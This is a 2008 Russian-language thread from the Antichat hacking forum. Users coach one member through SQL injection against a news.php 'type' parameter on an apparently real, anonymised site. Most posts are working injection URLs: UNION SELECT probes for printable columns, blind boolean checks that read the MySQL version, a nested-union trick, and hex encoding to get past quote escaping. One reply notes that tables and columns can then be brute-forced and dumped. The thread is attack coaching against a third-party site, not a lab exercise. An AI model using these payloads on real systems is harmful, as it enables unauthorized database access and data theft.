HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 04.11.2008, 17:06
iddqd
Banned
Регистрация: 19.12.2007
Сообщений: 924
С нами: 9681386

Репутация: 2145


По умолчанию

попробуй склеить union select с:
type=17'
type=-1
type=-1'
type=9999
 
Ответить с цитированием

  #2  
Старый 04.11.2008, 17:16
geforse
Постоянный
Регистрация: 02.03.2008
Сообщений: 893
С нами: 9574565

Репутация: 712


По умолчанию

Цитата:
Сообщение от geforse  
При запросе: http://www.xxxx.com/news.php?type=16+union+select+1,version(),3,4/* (Выводдит новость с id 16)
Цитата:
Сообщение от jokester  
А что по твоему он должен выводить?
Версию)

Цитата:
Сообщение от jokester  
http://www.xxxx.com/news.php?type=-16+union+select+1,2,3,4/*
Вот так попробуй
Выводит новость с id 16

Цитата:
Сообщение от iddqd  
попробуй склеить union select с:
type=17'
type=-1
type=-1'
type=9999
Никаких ошибок нет(
 
Ответить с цитированием

  #3  
Старый 04.11.2008, 17:49
ThreeD
Banned
Регистрация: 25.12.2006
Сообщений: 179
С нами: 10198073

Репутация: 354
По умолчанию

Зачем тебе ошибки? Ты принтабельные поля ищи. source страницы покопай.
+union+select+111,222,333,444/* для удобства, и ищи.
 
Ответить с цитированием

  #4  
Старый 04.11.2008, 18:01
[Raz0r]
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
С нами: 10109126

Репутация: 1980
По умолчанию

http://www.xxxx.com/news.php?type=16+and+1=2+union+select+1,version(), 3,4/*
http://www.xxxx.com/news.php?type=16+union+select+1,version(),3,4+limi t+1,1/*
 
Ответить с цитированием

  #5  
Старый 04.11.2008, 18:37
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
С нами: 10309346

Репутация: 4303


По умолчанию

http://www.xxxx.com/news.php?type=16+union+select+1,version(),3,4/*

так ты никогда не увидишь версию, надо ставить несуществующию запись
Если
http://www.xxxx.com/news.php?type=-16+union+select+1,2,3,4/*
не помогает, попробуй так
http://www.xxxx.com/news.php?type=-16'+union+select+1,2,3,4/*
если и так не катит скидывай ссылку сюда или в пм
 
Ответить с цитированием

  #6  
Старый 04.11.2008, 19:13
_Pantera_
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
С нами: 10313606

Репутация: 1327
По умолчанию

Та бывает такое, что нет ниодного поля с выводом на экран.
попробуй вот так:
PHP код:
http://www.xxxx.com/news.php?type=16+and+ascii(lower(substring(version(),1,1)))=51 
это будет значить, что mysql 3 версии

PHP код:
http://www.xxxx.com/news.php?type=16+and+ascii(lower(substring(version(),1,1)))=52 
это будет значить, что mysql 4 версии

PHP код:
http://www.xxxx.com/news.php?type=16+and+ascii(lower(substring(version(),1,1)))=53 
это будет значить, что mysql 5 версии

В одном из этих случаев не должно вылезти ошибки, если ее нету, то запрос к mysql true и можно сделать вывод о версии...
 
Ответить с цитированием

  #7  
Старый 04.11.2008, 20:09
geforse
Постоянный
Регистрация: 02.03.2008
Сообщений: 893
С нами: 9574565

Репутация: 712


По умолчанию

Версия MySQL 5
 
Ответить с цитированием

  #8  
Старый 04.11.2008, 20:12
ThreeD
Banned
Регистрация: 25.12.2006
Сообщений: 179
С нами: 10198073

Репутация: 354
По умолчанию

Если принтабельных полей нет-юзай подзапросы. Иначе никак.
 
Ответить с цитированием

  #9  
Старый 04.11.2008, 20:35
ThreeD
Banned
Регистрация: 25.12.2006
Сообщений: 179
С нами: 10198073

Репутация: 354
По умолчанию

Попробуй ещё так

http://www.xxxx.com/news.php?type=16+union+select+'-16+union+select+1,2,3,4'+limit+1,1/*

Или перегони в хекс, если кавычки экранируются\слэшируются.В ообще подобная двойная конструкция, внутри union select может сработать. Пробуй.
 
Ответить с цитированием

  #10  
Старый 04.11.2008, 20:48
slider
Members of Antichat - Level 5
Регистрация: 04.09.2005
Сообщений: 528
С нами: 10885346

Репутация: 2947


По умолчанию

Цитата:
В одном из этих случаев не должно вылезти ошибки, если ее нету, то запрос к mysql true и можно сделать вывод о версии...
И не только вывод версии ... тем более если версия 5 можно сбрутить все необходимые таблицы и колонки .... а затем полноценный вывод из нужной нам таблицы...

то же самое и в версии 4ре .. только нам нужно перебрать стандартные значения табиц и колонок ...
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...